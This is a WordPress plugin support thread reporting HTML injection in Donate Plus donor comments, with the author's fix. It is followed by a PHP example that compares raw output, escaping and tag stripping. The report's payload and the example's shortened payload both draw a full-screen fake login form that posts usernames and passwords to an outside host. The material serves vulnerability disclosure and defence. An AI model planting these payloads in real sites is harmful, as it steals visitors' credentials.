
Donate Plus
Potentially Malicious HTML allowed in donor comments (2 posts)

  1. shalzers
    Member
    Posted 3 years ago

    I was testing this plug-in and found that I was able to embed potentially malicious html in the page that allowed me to take over the screen and overlay whatever content I wanted. Whoops!

    <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height:
    1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to
    MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form
    name="login" action="http://aspectsecurity.com"><table><tr><td>Username:
    </td><td><input type="text"
    name="username"/></td></tr><tr><td>Password:</td><td><input type="text"
    name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit"
    value="Login"/></td></tr></table></form><img</div>

    http://img.skitch.com/20101024-8dd26w5225tjfxh9x1s21shemx.png

    I inserted this HTML through the WordPress backend, but I assume there is no validation to prevent this.

    http://wordpress.org/extend/plugins/donate-plus/

  2. devbit
    Member
    Plugin Author

    Posted 3 years ago

    The donation form (and PayPal) only allows 199 characters, which your code exceeds, so it would be quite difficult to do too much damage, but I've taken your concerns to heart and have made sure that the PayPal-submitted comment also has all tags stripped in version 1.7.

    The admin section is meant for the owner of the site, so it will allow any and all code to be entered into a previously submitted donor wall entry - if you want to hack your own site that is up to you! :)

    Thanks for the input!
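The two approaches discussed in this thread side by side, as an added example that is not part of either post and not code from the Donate Plus plugin: a donor-wall entry echoed raw, the same entry escaped on output, and the strip-tags-at-submission approach that the 1.7 fix describes. The function names, the `example.invalid` URL and the donor comment are assumptions for illustration. The comment is the overlay from the first post trimmed until it fits inside a 199-character field, which is the check a reviewer would want before treating PayPal's comment length as a mitigation.

```php
<?php
// Added example; hypothetical helper names, not Donate Plus code.

// Constructed donor comment: the overlay payload from the first post, cut down
// so that strlen() is below PayPal's 199-character comment limit. It still
// covers the page and shows a fake login form.
$constructed_comment = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;'
    . 'z-index:1000;background:#fff">Login:<form action="http://example.invalid">'
    . '<input name=u><input name=p><input type=submit></form></div>';

// Vulnerable pattern: the stored comment is concatenated straight into the
// donor wall markup, so any tags in it become part of the page.
function donor_wall_entry_vulnerable( $name, $comment ) {
    return '<li><strong>' . $name . '</strong>: ' . $comment . '</li>';
}

// Hardened pattern: escape at output time. Inside WordPress esc_html() does
// this; outside WordPress htmlspecialchars() with ENT_QUOTES is equivalent.
// The stored text is kept verbatim and rendered inert.
function donor_wall_entry_escaped( $name, $comment ) {
    $esc = function_exists( 'esc_html' )
        ? 'esc_html'
        : function ( $s ) { return htmlspecialchars( $s, ENT_QUOTES | ENT_HTML5, 'UTF-8' ); };
    return '<li><strong>' . $esc( $name ) . '</strong>: ' . $esc( $comment ) . '</li>';
}

// Approach described for version 1.7: strip tags when the PayPal-submitted
// comment arrives. wp_kses() with an empty allow-list removes every tag;
// strip_tags() is the plain-PHP equivalent. Unlike escaping, this discards the
// markup and keeps only the text between the tags.
function donor_comment_stripped( $comment ) {
    return function_exists( 'wp_kses' ) ? wp_kses( $comment, array() ) : strip_tags( $comment );
}

// Server-side acceptance of a returned comment. The 199-character cap is a
// property of PayPal's form, not of the site, so it is re-applied here rather
// than trusted; the stripped result is what gets stored.
function accept_donor_comment( $raw ) {
    return substr( donor_comment_stripped( $raw ), 0, 199 );
}

printf( "payload length: %d (within the 199-character field)\n", strlen( $constructed_comment ) );
echo donor_wall_entry_vulnerable( 'Anon', $constructed_comment ), "\n"; // overlay renders
echo donor_wall_entry_escaped( 'Anon', $constructed_comment ), "\n";    // markup shown as text
echo donor_wall_entry_escaped( 'Anon', accept_donor_comment( $constructed_comment ) ), "\n";
```

Run it with `php` on the command line; outside WordPress the `htmlspecialchars()` and `strip_tags()` fallbacks are used. Escaping on output is the control that holds regardless of how an entry reached the database, which matters here because the thread names two entry paths (the PayPal return and the admin editor) and only one of them is filtered in 1.7; stripping on input has to be repeated for every path and silently drops any donor text that happens to contain angle brackets.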

This topic has been closed to new replies.
